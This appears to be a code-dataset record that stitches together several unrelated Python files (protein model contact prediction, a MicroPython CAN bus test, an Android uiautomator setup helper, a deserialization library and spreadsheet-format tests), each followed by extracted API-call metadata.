attentions = attentions * attention_mask[:, None, None, :, :]
result["attentions"] = attentions
if return_contacts:
contacts = self._predict_contacts_from_token_attentions(tokens, attentions)
result["contacts"] = contacts
return result
def _predict_contacts_from_token_attentions(self, tokens, attentions):
# remove eos token attentions
if tokens[:, -1].eq(self.eos_idx).any():
eos_mask = tokens.ne(self.eos_idx).to(attentions)
eos_mask = eos_mask.unsqueeze(1) * eos_mask.unsqueeze(2)
attentions = attentions * eos_mask[:, None, None, :, :]
attentions = attentions[..., :-1, :-1]
# remove cls token attentions
if tokens[:, 0].eq(self.cls_idx).all():
attentions = attentions[..., 1:, 1:]
batch_size, layers, heads, seqlen, _ = attentions.size()
attentions = attentions.view(batch_size, layers * heads, seqlen, seqlen)
return self.contact_head(attentions)
def predict_contacts(self, tokens):
return self(tokens, return_contacts=True)["contacts"]
@property
def num_layers(self):
return self.args.layers
| [
"torch.nn.functional.linear",
"torch.stack",
"math.sqrt",
"torch.zeros",
"torch.nn.Embedding"
] | [((1887, 1975), 'torch.nn.Embedding', 'nn.Embedding', (['self.alphabet_size', 'self.args.embed_dim'], {'padding_idx': 'self.padding_idx'}), '(self.alphabet_size, self.args.embed_dim, padding_idx=self.\n padding_idx)\n', (1899, 1975), True, 'import torch.nn as nn\n'), ((3156, 3186), 'math.sqrt', 'math.sqrt', (['self.args.embed_dim'], {}), '(self.args.embed_dim)\n', (3165, 3186), False, 'import math\n'), ((3338, 3392), 'torch.zeros', 'torch.zeros', (['(self.alphabet_size, self.args.embed_dim)'], {}), '((self.alphabet_size, self.args.embed_dim))\n', (3349, 3392), False, 'import torch\n'), ((5680, 5733), 'torch.nn.functional.linear', 'F.linear', (['x', 'self.embed_out'], {'bias': 'self.embed_out_bias'}), '(x, self.embed_out, bias=self.embed_out_bias)\n', (5688, 5733), True, 'import torch.nn.functional as F\n'), ((5967, 5995), 'torch.stack', 'torch.stack', (['attn_weights', '(1)'], {}), '(attn_weights, 1)\n', (5978, 5995), False, 'import torch\n'), ((3518, 3549), 'torch.zeros', 'torch.zeros', (['self.alphabet_size'], {}), '(self.alphabet_size)\n', (3529, 3549), False, 'import torch\n')] |
from pyb import CAN
CAN.initfilterbanks(14)
can = CAN(1)
print(can)
can.init(CAN.LOOPBACK)
print(can)
print(can.any(0))
# Catch all filter
can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0))
can.send('abcd', 123)
print(can.any(0))
print(can.recv(0))
can.send('abcd', -1)
print(can.recv(0))
can.send('abcd', 0x7FF + 1)
print(can.recv(0))
# Test too long message
try:
can.send('abcdefghi', 0x7FF)
except ValueError:
print('passed')
else:
print('failed')
del can
# Testing extended IDs
can = CAN(1, CAN.LOOPBACK, extframe = True)
# Catch all filter
can.setfilter(0, CAN.MASK32, 0, (0, 0))
print(can)
try:
can.send('abcde', 0x7FF + 1)
except ValueError:
print('failed')
else:
r = can.recv(0)
if r[0] == 0x7FF+1 and r[3] == b'abcde':
print('passed')
else:
print('failed, wrong data received')
del can
# Test RxCallbacks
can = CAN(1, CAN.LOOPBACK)
can.setfilter(0, CAN.LIST16, 0, (1, 2, 3, 4))
can.setfilter(1, CAN.LIST16, 1, (5, 6, 7, 8))
def cb0(bus, reason):
print('cb0')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1(bus, reason):
print('cb1')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb0a(bus, reason):
print('cb0a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1a(bus, reason):
print('cb1a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
can.rxcallback(0, cb0)
can.rxcallback(1, cb1)
can.send('11111111',1)
can.send('22222222',2)
can.send('33333333',3)
can.rxcallback(0, cb0a)
can.send('44444444',4)
can.send('55555555',5)
can.send('66666666',6)
can.send('77777777',7)
can.rxcallback(1, cb1a)
can.send('88888888',8)
print(can.recv(0))
print(can.recv(0))
print(can.recv(0))
print(can.recv(1))
print(can.recv(1))
print(can.recv(1))
can.send('11111111',1)
can.send('55555555',5)
print(can.recv(0))
print(can.recv(1))
| [
"pyb.CAN",
"pyb.CAN.initfilterbanks"
] | [((21, 44), 'pyb.CAN.initfilterbanks', 'CAN.initfilterbanks', (['(14)'], {}), '(14)\n', (40, 44), False, 'from pyb import CAN\n'), ((51, 57), 'pyb.CAN', 'CAN', (['(1)'], {}), '(1)\n', (54, 57), False, 'from pyb import CAN\n'), ((504, 539), 'pyb.CAN', 'CAN', (['(1)', 'CAN.LOOPBACK'], {'extframe': '(True)'}), '(1, CAN.LOOPBACK, extframe=True)\n', (507, 539), False, 'from pyb import CAN\n'), ((876, 896), 'pyb.CAN', 'CAN', (['(1)', 'CAN.LOOPBACK'], {}), '(1, CAN.LOOPBACK)\n', (879, 896), False, 'from pyb import CAN\n')] |
#-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu <EMAIL>'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
初始化uiautomator
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
本地,初始化UiAutomator
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
| [
"logging.getLogger",
"os.path.join",
"os.environ.get",
"time.sleep",
"os.path.realpath",
"wpyscripts.common.adb_process.AdbTool"
] | [((870, 897), 'logging.getLogger', 'logging.getLogger', (['"""wetest"""'], {}), "('wetest')\n", (887, 897), False, 'import logging\n'), ((937, 980), 'os.environ.get', 'os.environ.get', (['"""UIAUTOMATOR_PORT"""', '"""19008"""'], {}), "('UIAUTOMATOR_PORT', '19008')\n", (951, 980), False, 'import os\n'), ((1263, 1272), 'wpyscripts.common.adb_process.AdbTool', 'AdbTool', ([], {}), '()\n', (1270, 1272), False, 'from wpyscripts.common.adb_process import AdbTool\n'), ((1515, 1528), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (1525, 1528), False, 'import time\n'), ((1640, 1673), 'os.environ.get', 'os.environ.get', (['"""UIAUTOMATORPORT"""'], {}), "('UIAUTOMATORPORT')\n", (1654, 1673), False, 'import os\n'), ((1172, 1261), 'os.path.join', 'os.path.join', (['file_path', '""".."""', '"""third"""', '"""libs"""', '"""uiAutomator"""', '"""uiautomator-stub.jar"""'], {}), "(file_path, '..', 'third', 'libs', 'uiAutomator',\n 'uiautomator-stub.jar')\n", (1184, 1261), False, 'import os\n'), ((1088, 1114), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1104, 1114), False, 'import os\n'), ((2034, 2076), 'os.environ.get', 'os.environ.get', (['"""PLATFORM_IP"""', '"""127.0.0.1"""'], {}), "('PLATFORM_IP', '127.0.0.1')\n", (2048, 2076), False, 'import os\n')] |
"""A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
# It wasn't a straight forward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
| [
"typing.get_type_hints",
"deserialize.decorators._get_downcast_field",
"deserialize.decorators._call_constructed",
"deserialize.decorators._has_default",
"deserialize.decorators._get_default",
"deserialize.decorators._should_ignore",
"deserialize.decorators._allows_downcast_fallback",
"deserialize.exceptions.UndefinedDowncastException",
"deserialize.decorators._uses_auto_snake",
"deserialize.decorators._should_allow_unhandled",
"deserialize.decorators._get_parser",
"deserialize.exceptions.InvalidBaseTypeException",
"deserialize.conversions.camel_case",
"deserialize.exceptions.DeserializeException",
"deserialize.decorators._get_key",
"deserialize.conversions.pascal_case",
"deserialize.decorators._get_downcast_class"
] | [((10847, 10883), 'deserialize.decorators._get_downcast_field', '_get_downcast_field', (['class_reference'], {}), '(class_reference)\n', (10866, 10883), False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((11760, 11798), 'typing.get_type_hints', 'typing.get_type_hints', (['class_reference'], {}), '(class_reference)\n', (11781, 11798), False, 'import typing\n'), ((14835, 14885), 'deserialize.decorators._call_constructed', '_call_constructed', (['class_reference', 'class_instance'], {}), '(class_reference, class_instance)\n', (14852, 14885), False, 'from deserialize.decorators import constructed, _call_constructed\n'), ((2330, 2390), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Unexpected raw storage mode: {self}"""'], {}), "(f'Unexpected raw storage mode: {self}')\n", (2350, 2390), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((2707, 2804), 'deserialize.exceptions.InvalidBaseTypeException', 'InvalidBaseTypeException', (['"""Only lists and dictionaries are supported as base raw data types"""'], {}), "(\n 'Only lists and dictionaries are supported as base raw data types')\n", (2731, 2804), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((6091, 6130), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['exception_message'], {}), '(exception_message)\n', (6111, 6130), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((7710, 7808), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Unsupported deserialization type: {class_reference} for {debug_name}"""'], {}), "(\n f'Unsupported deserialization type: {class_reference} for {debug_name}')\n", (7730, 7808), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((8508, 8603), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Cannot deserialize a list to \'{class_reference}\' for {debug_name}"""'], {}), '(\n f"Cannot deserialize a list to \'{class_reference}\' for {debug_name}")\n', (8528, 8603), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((9456, 9552), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Data was not dict for instance: {class_reference} for {debug_name}"""'], {}), "(\n f'Data was not dict for instance: {class_reference} for {debug_name}')\n", (9476, 9552), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((11009, 11061), 'deserialize.decorators._get_downcast_class', '_get_downcast_class', (['class_reference', 'downcast_value'], {}), '(class_reference, downcast_value)\n', (11028, 11061), False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((11838, 11965), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"""'], {}), "(\n f'Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})'\n )\n", (11858, 11965), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12047, 12094), 'deserialize.decorators._should_ignore', '_should_ignore', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (12061, 12094), False, 'from deserialize.decorators import ignore, _should_ignore\n'), ((12141, 12182), 'deserialize.decorators._get_key', '_get_key', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (12149, 12182), False, 'from deserialize.decorators import key, _get_key\n'), ((12209, 12251), 'deserialize.decorators._get_parser', '_get_parser', (['class_reference', 'property_key'], {}), '(class_reference, property_key)\n', (12220, 12251), False, 'from deserialize.decorators import parser, _get_parser\n'), ((7568, 7669), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""No value for \'{debug_name}\'. Expected value of type \'{class_reference}\'"""'], {}), '(\n f"No value for \'{debug_name}\'. Expected value of type \'{class_reference}\'")\n', (7588, 7669), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((11111, 11153), 'deserialize.decorators._allows_downcast_fallback', '_allows_downcast_fallback', (['class_reference'], {}), '(class_reference)\n', (11136, 11153), False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((11449, 11595), 'deserialize.exceptions.UndefinedDowncastException', 'UndefinedDowncastException', (['f"""Could not find subclass of {class_reference} with downcast identifier \'{downcast_value}\' for {debug_name}"""'], {}), '(\n f"Could not find subclass of {class_reference} with downcast identifier \'{downcast_value}\' for {debug_name}"\n )\n', (11475, 11595), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12503, 12536), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', (['class_reference'], {}), '(class_reference)\n', (12519, 12536), False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((12601, 12734), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"""'], {}), "(\n f'When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}'\n )\n", (12621, 12734), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((9989, 10096), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Could not deserialize key {dict_key} to type {key_type} for {debug_name}"""'], {}), "(\n f'Could not deserialize key {dict_key} to type {key_type} for {debug_name}'\n )\n", (10009, 10096), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12352, 12431), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""ClassVars cannot be set: {debug_name}.{attribute_name}"""'], {}), "(f'ClassVars cannot be set: {debug_name}.{attribute_name}')\n", (12372, 12431), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12969, 13002), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', (['class_reference'], {}), '(class_reference)\n', (12985, 13002), False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((13007, 13031), 'deserialize.conversions.camel_case', 'camel_case', (['property_key'], {}), '(property_key)\n', (13017, 13031), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13066, 13090), 'deserialize.conversions.camel_case', 'camel_case', (['property_key'], {}), '(property_key)\n', (13076, 13090), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13123, 13147), 'deserialize.conversions.camel_case', 'camel_case', (['property_key'], {}), '(property_key)\n', (13133, 13147), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13214, 13247), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', (['class_reference'], {}), '(class_reference)\n', (13230, 13247), False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((13478, 13523), 'deserialize.decorators._has_default', '_has_default', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (13490, 13523), False, 'from deserialize.decorators import default, _get_default, _has_default\n'), ((14594, 14639), 'deserialize.decorators._should_allow_unhandled', '_should_allow_unhandled', (['class_reference', 'key'], {}), '(class_reference, key)\n', (14617, 14639), False, 'from deserialize.decorators import allow_unhandled, _should_allow_unhandled\n'), ((13252, 13277), 'deserialize.conversions.pascal_case', 'pascal_case', (['property_key'], {}), '(property_key)\n', (13263, 13277), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13312, 13337), 'deserialize.conversions.pascal_case', 'pascal_case', (['property_key'], {}), '(property_key)\n', (13323, 13337), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13370, 13395), 'deserialize.conversions.pascal_case', 'pascal_case', (['property_key'], {}), '(property_key)\n', (13381, 13395), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13562, 13607), 'deserialize.decorators._get_default', '_get_default', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (13574, 13607), False, 'from deserialize.decorators import default, _get_default, _has_default\n'), ((13837, 13926), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Unexpected missing value for: {debug_name}.{attribute_name}"""'], {}), "(\n f'Unexpected missing value for: {debug_name}.{attribute_name}')\n", (13857, 13926), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n')] |
from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| [
"ssf.SSF"
